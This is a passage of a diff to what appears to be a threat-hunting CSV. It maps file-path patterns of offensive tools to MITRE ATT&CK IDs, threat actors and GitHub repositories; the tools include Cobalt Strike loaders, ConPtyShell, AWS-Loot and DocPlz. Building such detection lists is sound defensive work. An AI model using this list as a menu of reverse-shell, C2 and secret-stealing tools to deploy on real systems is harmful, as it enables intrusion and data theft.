known for exploitation tools dev","N/A","N/A","N/A","N/A","POST Exploitation tools","https://github.com/Cn33liz","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/cna/pipetest.cna*","offensive_tool_keyword","cobaltstrike","Example code for using named pipe output with beacon ReflectiveDLLs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rxwx/cs-rdll-ipc-example","1","1","N/A","10","10","101","24","2020-06-24T19:47:35Z","2020-06-24T19:43:56Z" 
@@ -3107,17 +3113,17 @@ "*/cobalt-strike*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*/cobaltstrike/c2lint*","offensive_tool_keyword","C2concealer","C2concealer is a command line tool that generates randomized C2 malleable profiles for use in Cobalt Strike.","T1090 - T1090.003 - T1027 - T1027.005 - T1071 - T1071.001","TA0042 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/RedSiege/C2concealer","1","0","N/A","10","10","850","162","2021-09-26T16:37:06Z","2020-03-23T14:13:16Z" "*/CodeBuildLooter.py*","offensive_tool_keyword","AWS-Loot","Searches an AWS environment looking for secrets. by enumerating environment variables and source code. 
This tool allows quick enumeration over large sets of AWS instances and services.","T1552","TA0002","N/A","N/A","Exploitation tools","https://github.com/sebastian-mora/AWS-Loot","1","1","N/A","N/A","1","64","14","2020-02-02T00:51:56Z","2020-02-02T00:25:46Z" -"*/coercer.egg-info*","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/p0dalirius/Coercer","1","1","N/A","N/A","10","1359","152","2023-09-22T07:44:36Z","2022-06-30T16:52:33Z" -"*/Coercer.git*","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/p0dalirius/Coercer","1","1","N/A","N/A","10","1359","152","2023-09-22T07:44:36Z","2022-06-30T16:52:33Z" -"*/Coercer.py*","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/p0dalirius/Coercer","1","1","N/A","N/A","10","1359","152","2023-09-22T07:44:36Z","2022-06-30T16:52:33Z" -"*/Coercer/*.py","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/p0dalirius/Coercer","1","1","N/A","N/A","10","1359","152","2023-09-22T07:44:36Z","2022-06-30T16:52:33Z" -"*/coercer_output_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - 
TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*/coercer.egg-info*","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/p0dalirius/Coercer","1","1","N/A","N/A","10","1361","154","2023-10-04T05:59:13Z","2022-06-30T16:52:33Z" +"*/Coercer.git*","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/p0dalirius/Coercer","1","1","N/A","N/A","10","1361","154","2023-10-04T05:59:13Z","2022-06-30T16:52:33Z" +"*/Coercer.py*","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/p0dalirius/Coercer","1","1","N/A","N/A","10","1361","154","2023-10-04T05:59:13Z","2022-06-30T16:52:33Z" +"*/Coercer/*.py","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/p0dalirius/Coercer","1","1","N/A","N/A","10","1361","154","2023-10-04T05:59:13Z","2022-06-30T16:52:33Z" +"*/coercer_output_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network 
Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" "*/CoffeeLdr.c*","offensive_tool_keyword","cobaltstrike","Beacon Object File Loader","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cracked5pider/CoffeeLdr","1","1","N/A","10","10","230","31","2022-11-07T20:56:54Z","2022-07-18T15:21:11Z" "*/CoffeeLdr/*","offensive_tool_keyword","cobaltstrike","Beacon Object File Loader","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - 
T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cracked5pider/CoffeeLdr","1","1","N/A","10","10","230","31","2022-11-07T20:56:54Z","2022-07-18T15:21:11Z" -"*/COFFLoader*","offensive_tool_keyword","cobaltstrike","This is a quick and dirty COFF loader (AKA Beacon Object Files). Currently can run un-modified BOF's so it can be used for testing without a CS agent running it","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/COFFLoader","1","1","N/A","10","10","386","62","2023-05-15T20:42:41Z","2021-02-19T19:14:43Z" +"*/COFFLoader*","offensive_tool_keyword","cobaltstrike","This is a quick and dirty COFF loader (AKA Beacon Object Files). 
Currently can run un-modified BOF's so it can be used for testing without a CS agent running it","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/COFFLoader","1","1","N/A","10","10","387","62","2023-05-15T20:42:41Z","2021-02-19T19:14:43Z" "*/COFFLoader2/*","offensive_tool_keyword","cobaltstrike","Load and execute COFF files and Cobalt Strike BOFs in-memory","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - 
TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Yaxser/COFFLoader2","1","1","N/A","10","10","156","40","2022-09-13T14:58:30Z","2021-12-14T07:49:17Z" "*/collection/screengrab*","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","1","N/A","10","10","1004","158","2023-07-15T05:34:10Z","2020-06-30T19:24:13Z" -"*/com/blackh4t/*","offensive_tool_keyword","cobaltstrike","Practice Go programming and implement CobaltStrike's Beacon in Go","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/darkr4y/geacon","1","1","N/A","10","10","1038","224","2020-10-02T10:34:37Z","2020-02-14T14:01:29Z" +"*/com/blackh4t/*","offensive_tool_keyword","cobaltstrike","Practice Go programming and implement CobaltStrike's Beacon in Go","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/darkr4y/geacon","1","1","N/A","10","10","1038","225","2020-10-02T10:34:37Z","2020-02-14T14:01:29Z" "*/combine_harvester.git*","offensive_tool_keyword","combine_harvester","Rust in-memory dumper","T1055 - T1055.001 - T1055.012","TA0005 - TA0006","N/A","N/A","Defense Evasion","https://github.com/m3f157O/combine_harvester","1","1","N/A","10","2","101","17","2023-07-26T07:16:00Z","2023-07-20T07:37:51Z" "*/comfoo.profile*","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. 
These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","1","N/A","10","10","1362","429","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z" "*/COM-Hunter.csproj*","offensive_tool_keyword","COM-Hunter","COM-hunter is a COM Hijacking persistnce tool written in C#","T1122 - T1055.012","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/nickvourd/COM-Hunter","1","1","N/A","10","3","215","39","2023-09-06T09:48:55Z","2022-05-26T19:34:59Z" 
@@ -3125,15 +3131,15 @@ "*/COM-Hunter.git*","offensive_tool_keyword","COM-Hunter","COM-hunter is a COM Hijacking persistnce tool written in C#","T1122 - T1055.012","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/nickvourd/COM-Hunter","1","1","N/A","10","3","215","39","2023-09-06T09:48:55Z","2022-05-26T19:34:59Z" "*/COM-Hunter.sln*","offensive_tool_keyword","COM-Hunter","COM-hunter is a COM Hijacking persistnce tool written in C#","T1122 - T1055.012","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/nickvourd/COM-Hunter","1","1","N/A","10","3","215","39","2023-09-06T09:48:55Z","2022-05-26T19:34:59Z" "*/commandcontrol/malware*.py*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" -"*/commando-vm*","offensive_tool_keyword","commando-vm","CommandoVM - a fully customizable Windows-based security distribution for penetration testing and red teaming.","T1059 - T1053 - T1055 - T1070","TA0002 - TA0004 - TA0008","N/A","N/A","Exploitation OS","https://github.com/mandiant/commando-vm","1","1","N/A","N/A","10","6323","1248","2023-10-03T19:02:49Z","2019-03-26T22:36:32Z" -"*/commix.git","offensive_tool_keyword","commix","Automated All-in-One OS command injection and exploitation tool.","T1059 - T1053 - T1503","TA0002 - TA0003 - TA0040","N/A","N/A","Exploitation tools","https://github.com/commixproject/commix","1","1","N/A","N/A","10","4034","781","2023-09-29T06:39:41Z","2015-03-20T08:38:26Z" -"*/commix.py*","offensive_tool_keyword","commix","Automated All-in-One OS command injection and exploitation tool.","T1059 - T1053 - T1503","TA0002 - TA0003 - TA0040","N/A","N/A","Exploitation 
tools","https://github.com/commixproject/commix","1","1","N/A","N/A","10","4034","781","2023-09-29T06:39:41Z","2015-03-20T08:38:26Z" +"*/commando-vm*","offensive_tool_keyword","commando-vm","CommandoVM - a fully customizable Windows-based security distribution for penetration testing and red teaming.","T1059 - T1053 - T1055 - T1070","TA0002 - TA0004 - TA0008","N/A","N/A","Exploitation OS","https://github.com/mandiant/commando-vm","1","1","N/A","N/A","10","6326","1249","2023-10-03T19:02:49Z","2019-03-26T22:36:32Z" +"*/commix.git","offensive_tool_keyword","commix","Automated All-in-One OS command injection and exploitation tool.","T1059 - T1053 - T1503","TA0002 - TA0003 - TA0040","N/A","N/A","Exploitation tools","https://github.com/commixproject/commix","1","1","N/A","N/A","10","4035","782","2023-09-29T06:39:41Z","2015-03-20T08:38:26Z" +"*/commix.py*","offensive_tool_keyword","commix","Automated All-in-One OS command injection and exploitation tool.","T1059 - T1053 - T1503","TA0002 - TA0003 - TA0040","N/A","N/A","Exploitation tools","https://github.com/commixproject/commix","1","1","N/A","N/A","10","4035","782","2023-09-29T06:39:41Z","2015-03-20T08:38:26Z" "*/common/beacon.go*","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","1","N/A","10","10","451","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" -"*/common_pass.txt*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5262","1327","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"*/common_pass.txt*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information 
Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" "*/completions/exegol.fish*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*/ComunicationC2.cpp*","offensive_tool_keyword","DocPlz","Documents Exfiltration and C2 project","T1105 - T1567 - T1071","TA0011 - TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/TheD1rkMtr/DocPlz","1","1","N/A","10","1","48","6","2023-10-03T23:06:53Z","2023-10-02T20:49:22Z" -"*/config/doNmapScanWin.bat *","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","1","N/A","10","10","4019","483","2023-09-30T05:33:44Z","2022-06-20T03:11:08Z" -"*/ConPtyShell/*","offensive_tool_keyword","ConPtyShell","ConPtyShell - Fully Interactive Reverse Shell for Windows","T1021 - T1071","TA0002","N/A","N/A","Exploitation tools","https://github.com/antonioCoco/ConPtyShell","1","1","N/A","N/A","9","817","150","2023-01-20T10:52:52Z","2019-09-13T22:11:18Z" +"*/ComunicationC2.cpp*","offensive_tool_keyword","DocPlz","Documents Exfiltration and C2 project","T1105 - T1567 - T1071","TA0011 - TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/TheD1rkMtr/DocPlz","1","1","N/A","10","1","81","13","2023-10-03T23:06:53Z","2023-10-02T20:49:22Z" +"*/config/doNmapScanWin.bat 
*","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","1","N/A","10","10","4058","489","2023-09-30T05:33:44Z","2022-06-20T03:11:08Z" +"*/ConPtyShell/*","offensive_tool_keyword","ConPtyShell","ConPtyShell - Fully Interactive Reverse Shell for Windows","T1021 - T1071","TA0002","N/A","N/A","Exploitation tools","https://github.com/antonioCoco/ConPtyShell","1","1","N/A","N/A","9","819","150","2023-01-20T10:52:52Z","2019-09-13T22:11:18Z" "*/ContainYourself.git*","offensive_tool_keyword","ContainYourself","Abuses the Windows containers framework to bypass EDRs.","T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015","TA0005","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/ContainYourself","1","1","N/A","10","3","257","31","2023-08-31T07:26:22Z","2023-07-12T14:47:24Z" "*/CookieProcessor.cs*","offensive_tool_keyword","cobaltstrike","C or BOF file to extract WebKit master key to decrypt user cookie. The C code can be used to compile an executable or a bof script for Cobalt Strike.","T1552.002 - T1027.001 - T1059.003 - T1003.001","TA0006 - TA0005 - TA0002 - TA0003","N/A","N/A","C2","https://github.com/Mr-Un1k0d3r/Cookie-Graber-BOF","1","1","N/A","10","10","104","14","2023-05-28T18:41:15Z","2023-05-28T18:30:02Z" "*/Cooolis-ms/*","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. 
and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","868","140","2023-05-22T22:18:47Z","2019-03-31T14:23:57Z" 
@@ -3142,44 +3148,44 @@ "*/core/browser_windows.go*","offensive_tool_keyword","cobaltstrike","reflective module for HackBrowserData","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - 